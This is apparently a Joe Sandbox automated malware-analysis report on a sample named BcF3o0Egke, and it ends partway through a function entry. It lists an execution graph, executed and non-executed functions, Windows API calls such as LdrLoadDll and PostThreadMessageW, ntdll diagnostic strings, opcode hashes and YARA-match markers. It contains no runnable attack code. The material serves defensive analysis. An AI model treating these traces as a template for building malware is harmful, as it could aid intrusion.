                                                                    execution_graph 92277 424bc3 92278 424bdf 92277->92278 92279 424c07 92278->92279 92280 424c1b 92278->92280 92281 42c8d3 NtClose 92279->92281 92287 42c8d3 92280->92287 92283 424c10 92281->92283 92284 424c24 92290 42ea93 RtlAllocateHeap 92284->92290 92286 424c2f 92288 42c8f0 92287->92288 92289 42c901 NtClose 92288->92289 92289->92284 92290->92286 92295 424f53 92296 424f6c 92295->92296 92297 424fb7 92296->92297 92300 424ffa 92296->92300 92302 424fff 92296->92302 92303 42e973 92297->92303 92301 42e973 RtlFreeHeap 92300->92301 92301->92302 92306 42cc43 92303->92306 92305 424fc7 92307 42cc60 92306->92307 92308 42cc71 RtlFreeHeap 92307->92308 92308->92305 92309 42fa13 92310 42fa23 92309->92310 92311 42fa29 92309->92311 92314 42ea53 92311->92314 92313 42fa4f 92317 42cbf3 92314->92317 92316 42ea6e 92316->92313 92318 42cc10 92317->92318 92319 42cc21 RtlAllocateHeap 92318->92319 92319->92316 92320 42bed3 92321 42bef0 92320->92321 92324 15c2df0 LdrInitializeThunk 92321->92324 92322 42bf18 92324->92322 92325 413d73 92326 413d95 92325->92326 92328 42cb63 92325->92328 92329 42cb80 92328->92329 92332 15c2c70 LdrInitializeThunk 92329->92332 92330 42cba8 92330->92326 92332->92330 92333 41a833 92334 41a84b 92333->92334 92336 41a8a5 92333->92336 92334->92336 92337 41e753 92334->92337 92338 41e779 92337->92338 92344 41e879 92338->92344 92346 42fb43 92338->92346 92340 41e80e 92341 41e870 92340->92341 92340->92344 92357 42bf23 92340->92357 92341->92344 92352 428b53 92341->92352 92344->92336 92345 41e931 92345->92336 92347 42fab3 92346->92347 92348 42ea53 RtlAllocateHeap 92347->92348 92351 42fb10 92347->92351 92349 42faed 92348->92349 92350 42e973 RtlFreeHeap 92349->92350 92350->92351 92351->92340 92353 428bb8 92352->92353 92354 428bf3 92353->92354 92361 418e23 92353->92361 92354->92345 92356 428bd5 92356->92345 92358 42bf40 92357->92358 92368 15c2c0a 92358->92368 92359 42bf6c 92359->92341 92362 418dbf 92361->92362 92364 418e0b 92361->92364 92365 42cc93 92362->92365 92364->92356 92366 42ccb0 92365->92366 92367 42ccc1 ExitProcess 92366->92367 92367->92364 92369 15c2c1f LdrInitializeThunk 92368->92369 92370 15c2c11 92368->92370 92369->92359 92370->92359 92371 4142d3 92372 4142ec 92371->92372 92377 417a73 92372->92377 92374 41430a 92375 414356 92374->92375 92376 414343 PostThreadMessageW 92374->92376 92376->92375 92379 417a97 92377->92379 92378 417a9e 92378->92374 92379->92378 92381 417abd 92379->92381 92384 42fdf3 LdrLoadDll 92379->92384 92382 417ad3 LdrLoadDll 92381->92382 92383 417aea 92381->92383 92382->92383 92383->92374 92384->92381 92385 41b593 92386 41b5d7 92385->92386 92387 41b5f8 92386->92387 92388 42c8d3 NtClose 92386->92388 92388->92387 92389 414416 92390 414419 92389->92390 92391 4143af 92389->92391 92392 414342 PostThreadMessageW 92391->92392 92393 414356 92391->92393 92392->92393 92291 418f48 92293 418f49 92291->92293 92292 42c8d3 NtClose 92294 418f01 92292->92294 92293->92292 92293->92294 92394 15c2b60 LdrInitializeThunk 92395 4019dc 92396 4019f1 92395->92396 92399 42fee3 92396->92399 92402 42e523 92399->92402 92403 42e549 92402->92403 92414 407273 92403->92414 92405 42e55f 92413 401afd 92405->92413 92417 41b3a3 92405->92417 92407 42e57e 92408 42e593 92407->92408 92409 42cc93 ExitProcess 92407->92409 92428 428463 92408->92428 92409->92408 92411 42e5ad 92412 42cc93 ExitProcess 92411->92412 92412->92413 92432 416723 92414->92432 92416 407280 92416->92405 92418 41b3cf 92417->92418 92443 41b293 92418->92443 92421 41b414 92424 41b430 92421->92424 92426 42c8d3 NtClose 92421->92426 92422 41b3fc 92423 41b407 92422->92423 92425 42c8d3 NtClose 92422->92425 92423->92407 92424->92407 92425->92423 92427 41b426 92426->92427 92427->92407 92429 4284c5 92428->92429 92431 4284d2 92429->92431 92454 4188e3 92429->92454 92431->92411 92434 41673d 92432->92434 92433 416756 92433->92416 92434->92433 92436 42d313 92434->92436 92438 42d32d 92436->92438 92437 42d35c 92437->92433 92438->92437 92439 42bf23 LdrInitializeThunk 92438->92439 92440 42d3b9 92439->92440 92441 42e973 RtlFreeHeap 92440->92441 92442 42d3d2 92441->92442 92442->92433 92444 41b389 92443->92444 92445 41b2ad 92443->92445 92444->92421 92444->92422 92449 42bfc3 92445->92449 92448 42c8d3 NtClose 92448->92444 92450 42bfdd 92449->92450 92453 15c35c0 LdrInitializeThunk 92450->92453 92451 41b37d 92451->92448 92453->92451 92456 41890d 92454->92456 92455 418e0b 92455->92431 92456->92455 92462 413f53 92456->92462 92458 418a34 92458->92455 92459 42e973 RtlFreeHeap 92458->92459 92460 418a4c 92459->92460 92460->92455 92461 42cc93 ExitProcess 92460->92461 92461->92455 92466 413f73 92462->92466 92464 413fd2 92464->92458 92465 413fdc 92465->92458 92466->92465 92467 41b6b3 RtlFreeHeap LdrInitializeThunk 92466->92467 92467->92464

                                                                    Executed Functions

                                                                    Function 00417A73 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 222 417a73-417a8f 223 417a97-417a9c 222->223 224 417a92 call 42f553 222->224 225 417aa2-417ab0 call 42fb53 223->225 226 417a9e-417aa1 223->226 224->223 229 417ac0-417ad1 call 42dff3 225->229 230 417ab2-417abd call 42fdf3 225->230 236 417ad3-417ae7 LdrLoadDll 229->236 237 417aea-417aed 229->237 230->229 236->237
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AE5
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_BcF3o0Egke.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: f7aca7ff22897dbe4d74d0a4087b515c599850f7e07237e5203b5d3da9a5bb0d
                                                                    • Instruction ID: 3da9ad656e2a33d7f058596d6c0db2f8ecc23348adbfd370e033ddd8e755fe76
                                                                    • Opcode Fuzzy Hash: f7aca7ff22897dbe4d74d0a4087b515c599850f7e07237e5203b5d3da9a5bb0d
                                                                    • Instruction Fuzzy Hash: EC0152B1E0010DBBDF10DAA5DC42FDEB778AF54308F4481A6E90897240F674EB588755
                                                                    Function 0042C8D3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 248 42c8d3-42c90f call 404663 call 42db03 NtClose
                                                                    APIs
                                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C90A
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_BcF3o0Egke.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 865acb2d5640172cea7701e8b8a714ff6b9d74cb1f623fdfa03c7267b3d5827b
                                                                    • Instruction ID: edcd4929374db9964348cfcf96216c1e7e48739ffbccb93e989d5216367ee6f6
                                                                    • Opcode Fuzzy Hash: 865acb2d5640172cea7701e8b8a714ff6b9d74cb1f623fdfa03c7267b3d5827b
                                                                    • Instruction Fuzzy Hash: CCE04F752042147BC220EA6ADC41FAB775CDFC6714F108419FA4977241C7757910C7F4
                                                                    Function 015C2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 262 15c2b60-15c2b6c LdrInitializeThunk
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 1fe3ec362dafc5f7d56a533111b94945b595d1b2564284bd36deb788ec045112
                                                                    • Instruction ID: 5ad913bc7a380b30c7b17b7691332b04d9a7cf7ed03286173fa25b175786ce1f
                                                                    • Opcode Fuzzy Hash: 1fe3ec362dafc5f7d56a533111b94945b595d1b2564284bd36deb788ec045112
                                                                    • Instruction Fuzzy Hash: 1F900265202410034115715C4414616405AA7E0211B59C421E1018990DC56589916326
                                                                    Function 015C2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4d1cbf7eae69e0c8a2f314b4d8ffc3e4510518b2af80117f932aa940f605d170
                                                                    • Instruction ID: b6b9ca5da50639972e37e34530b1bd3d0f11bf6a69bf4df69b6f463f0c8e3875
                                                                    • Opcode Fuzzy Hash: 4d1cbf7eae69e0c8a2f314b4d8ffc3e4510518b2af80117f932aa940f605d170
                                                                    • Instruction Fuzzy Hash: 6890023520141413D121715C45047070059A7D0251F99C812E0428958DD6968A52A322
                                                                    Function 015C2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 263 15c2c70-15c2c7c LdrInitializeThunk
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: d7a333232918dbb6137a9fc41bdbfd4cb6994878e773a71901d37ccc6f17fec1
                                                                    • Instruction ID: 448cc6d87bfa3c0a577c6cf6090b8f98127f21cd45aef7f6d9063e4e0287a2f5
                                                                    • Opcode Fuzzy Hash: d7a333232918dbb6137a9fc41bdbfd4cb6994878e773a71901d37ccc6f17fec1
                                                                    • Instruction Fuzzy Hash: 2290023520149802D120715C840474A0055A7D0311F5DC811E4428A58DC6D589917322
                                                                    Function 015C35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 52c2535fdb8539a8c1d06039c12627bb37a6bd8049454c5299d92654faa4418a
                                                                    • Instruction ID: 86620e19da5f5a81f7b9a681d168af534a5789d66b0d7e0795af803dd13edfeb
                                                                    • Opcode Fuzzy Hash: 52c2535fdb8539a8c1d06039c12627bb37a6bd8049454c5299d92654faa4418a
                                                                    • Instruction Fuzzy Hash: 0E90023560551402D110715C45147061055A7D0211F69C811E0428968DC7D58A5167A3
                                                                    Function 0041422D Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 62COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 41422d-414237 1 414271-414274 0->1 2 414239-414240 0->2 3 414242-41424c 2->3 4 414289-41429e 2->4 3->1 5 4142a0-4142b8 4->5 6 41431f-414341 4->6 5->6 7 414363-414368 6->7 8 414343-414354 PostThreadMessageW 6->8 8->7 9 414356-414360 8->9 9->7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_BcF3o0Egke.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: +Yf$7046-nn1K$7046-nn1K
                                                                    • API String ID: 0-152878582
                                                                    • Opcode ID: 8835f3a4d3a980d73cac9d5451b61f837560031cbaac1f6e90a95f3aac6059d8
                                                                    • Instruction ID: c275fd484e462aee15a3afa9325c1543472fcda4a2c72e174b33f2e44c37e21e
                                                                    • Opcode Fuzzy Hash: 8835f3a4d3a980d73cac9d5451b61f837560031cbaac1f6e90a95f3aac6059d8
                                                                    • Instruction Fuzzy Hash: 1B118C71B853576ACB02CEA08C81BDDB7649F92B00F0486EBE9449F6C1D3B58D878795
                                                                    Function 004142D3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(7046-nn1K,00000111,00000000,00000000), ref: 00414350
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_BcF3o0Egke.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID: 7046-nn1K$7046-nn1K
                                                                    • API String ID: 1836367815-59622768
                                                                    • Opcode ID: 08cef4079501bae7446cdd3a4563593f3a3346a9b3449423cb903043dd6c050e
                                                                    • Instruction ID: 516b92e160089bb7b3fe599ab1603a73bfc270ec1e4e33151ab2bbf8a00857f9
                                                                    • Opcode Fuzzy Hash: 08cef4079501bae7446cdd3a4563593f3a3346a9b3449423cb903043dd6c050e
                                                                    • Instruction Fuzzy Hash: FA010831E4021876DB20AB919C02FDF7B7C9F80B04F008016FB147B2C0D6BC570687A9
                                                                    Function 00414416 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 28 414416-414417 29 414419-414428 28->29 30 4143af 28->30 31 4143b1 30->31 32 414365-414368 30->32 34 4143b3-4143c0 31->34 35 414342-414354 PostThreadMessageW 31->35 38 4143c3-4143c6 34->38 36 414363-414364 35->36 37 414356-414360 35->37 36->32 37->36 39 4143e6-4143ea 38->39 40 4143c8-4143cc 38->40 39->38 41 4143ec-4143f0 39->41 40->39 42 4143ce-4143d2 40->42 42->39 43 4143d4-4143d8 42->43 43->39 44 4143da-4143de 43->44 44->39 45 4143e0-4143e4 44->45 45->39 46 4143f1-414401 45->46
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_BcF3o0Egke.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 7046-nn1K$7046-nn1K
                                                                    • API String ID: 0-59622768
                                                                    • Opcode ID: a47dd1c92f441ef4c73ff5499db73bb119073945b9849f7dce625e1cc4a0970a
                                                                    • Instruction ID: c4b73eb21b230dc31030ab9c1f53721eb1c4f484e884d00b70ebd9f1df3f4591
                                                                    • Opcode Fuzzy Hash: a47dd1c92f441ef4c73ff5499db73bb119073945b9849f7dce625e1cc4a0970a
                                                                    • Instruction Fuzzy Hash: 9701267578E28C2DFF31DA6068C1EE27F089782708F0881DFDD689F283D94A59865355
                                                                    Function 00417AF3 Relevance: 1.6, APIs: 1, Instructions: 62libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 212 417af3-417b2b 214 417b2c-417b37 212->214 214->214 215 417b39-417b40 214->215 216 417b42 215->216 217 417ac4-417ad1 call 42dff3 215->217 220 417ad3-417ae7 LdrLoadDll 217->220 221 417aea-417aed 217->221 220->221
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AE5
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_BcF3o0Egke.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 8d41206cb82bf2de7a09805619e6fe61e886688f6cc38260023a6cbf9ed9e3a9
                                                                    • Instruction ID: 974bac3e534c670f7ac2524caa8da76db0f880a9a0dc8598db73eafaeed0b4e5
                                                                    • Opcode Fuzzy Hash: 8d41206cb82bf2de7a09805619e6fe61e886688f6cc38260023a6cbf9ed9e3a9
                                                                    • Instruction Fuzzy Hash: 5A019C36A0810C7FCF10DAA4DC429EE7B78DF41285F040659D685E7201E632B64F8789
                                                                    Function 0042CBF3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 238 42cbf3-42cc37 call 404663 call 42db03 RtlAllocateHeap
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(?,0041E80E,?,?,00000000,?,0041E80E,?,?,?), ref: 0042CC32
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_BcF3o0Egke.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 9a88fbf9543032f2133e8a9cac2bb7711bd7b960dc0391e09488a6e464b12435
                                                                    • Instruction ID: 2846fa4b3233f60a92fef8d27f7aa413956122f50d55b758d752c0d3958e743e
                                                                    • Opcode Fuzzy Hash: 9a88fbf9543032f2133e8a9cac2bb7711bd7b960dc0391e09488a6e464b12435
                                                                    • Instruction Fuzzy Hash: 28E06DB12082097BCA10EE59DC41FAB37ACEFC5714F004419FA08A7241DB74B91087B8
                                                                    Function 0042CC43 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 243 42cc43-42cc87 call 404663 call 42db03 RtlFreeHeap
                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,33F84D8B,00000007,00000000,00000004,00000000,004172DE,000000F4), ref: 0042CC82
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_BcF3o0Egke.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: f35c0bb0e5c2be9d201f2d5a3767015d53e8d38ac539a827b4e54993e6d9bddc
                                                                    • Instruction ID: cc980803f6f00e9c11348fd80cdf1fb29ca32894386c6b15e328b1e50aae6e2f
                                                                    • Opcode Fuzzy Hash: f35c0bb0e5c2be9d201f2d5a3767015d53e8d38ac539a827b4e54993e6d9bddc
                                                                    • Instruction Fuzzy Hash: 80E092B12142087BD610EF59DC41FDB3BACEFC5710F004419FA08A7241D775B9108BB8
                                                                    Function 0042CC93 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 253 42cc93-42cccf call 404663 call 42db03 ExitProcess
                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,00000000,00000000,?,6995A257,?,?,6995A257), ref: 0042CCCA
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_BcF3o0Egke.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    • Opcode ID: 67cb749b5959da813ff9cc8226a13492c2e86e24a442318dac2c5c70b4266204
                                                                    • Instruction ID: ac3c5cb8458b9ec8aaad2dc6460039598258f1f05cf85b266bad946a97558dfc
                                                                    • Opcode Fuzzy Hash: 67cb749b5959da813ff9cc8226a13492c2e86e24a442318dac2c5c70b4266204
                                                                    • Instruction Fuzzy Hash: 38E086356002147BD110EB6ADC41FD7776CDFC6710F004519FA48A7242C675790187F5
                                                                    Function 015C2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 258 15c2c0a-15c2c0f 259 15c2c1f-15c2c26 LdrInitializeThunk 258->259 260 15c2c11-15c2c18 258->260
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 35738f7885bdac04e0f236b14dca648b522904f7e5c6bf9d15c86befa7740ac7
                                                                    • Instruction ID: 17b2f5ce8ec88fb5932d9890265186bc379e397b2240a1663e8e34853bcf6949
                                                                    • Opcode Fuzzy Hash: 35738f7885bdac04e0f236b14dca648b522904f7e5c6bf9d15c86befa7740ac7
                                                                    • Instruction Fuzzy Hash: 09B09B719015D5D9DA11E7A4860871B795077D0711F19C465D2034A41F4778C1D1E376

                                                                    Non-executed Functions

                                                                    Function 01602349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-2160512332
                                                                    • Opcode ID: c57b7c9e66bae72aeef4a193cf5b2a79c2ff265afcc2c6b7e8d4049b9ca3f238
                                                                    • Instruction ID: 320f45b9b7b4c5def6d209ca6bf1940bb166fc170697bee0aa77d0832be0a17b
                                                                    • Opcode Fuzzy Hash: c57b7c9e66bae72aeef4a193cf5b2a79c2ff265afcc2c6b7e8d4049b9ca3f238
                                                                    • Instruction Fuzzy Hash: 7B928C71644742AFE72ACE28CC94B6BB7E8BF84754F04481DFA949B390D770E844CB92
                                                                    Function 015B8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • Invalid debug info address of this critical section, xrefs: 015F54B6
                                                                    • 8, xrefs: 015F52E3
                                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015F54E2
                                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015F540A, 015F5496, 015F5519
                                                                    • corrupted critical section, xrefs: 015F54C2
                                                                    • Critical section debug info address, xrefs: 015F541F, 015F552E
                                                                    • Address of the debug info found in the active list., xrefs: 015F54AE, 015F54FA
                                                                    • Critical section address, xrefs: 015F5425, 015F54BC, 015F5534
                                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 015F5543
                                                                    • Thread identifier, xrefs: 015F553A
                                                                    • Critical section address., xrefs: 015F5502
                                                                    • undeleted critical section in freed memory, xrefs: 015F542B
                                                                    • double initialized or corrupted critical section, xrefs: 015F5508
                                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015F54CE
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                    • API String ID: 0-2368682639
                                                                    • Opcode ID: 7cb4c83cd9a474fb752747e1421967944b940c6fe9a8774fa1cbfafd5cdd76cb
                                                                    • Instruction ID: dd512531794ce3b3934beb23ef8487a1fe0bddbe9011ff742cd300686d40e615
                                                                    • Opcode Fuzzy Hash: 7cb4c83cd9a474fb752747e1421967944b940c6fe9a8774fa1cbfafd5cdd76cb
                                                                    • Instruction Fuzzy Hash: C4815D71A40359EFDB24CF99CC45BAEBBB9FB48714F10411EE604BB690E375A941CB90
                                                                    Function 015B29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • @, xrefs: 015F259B
                                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015F22E4
                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 015F2624
                                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015F24C0
                                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 015F2412
                                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015F25EB
                                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 015F2602
                                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 015F261F
                                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 015F2498
                                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 015F2409
                                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 015F2506
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
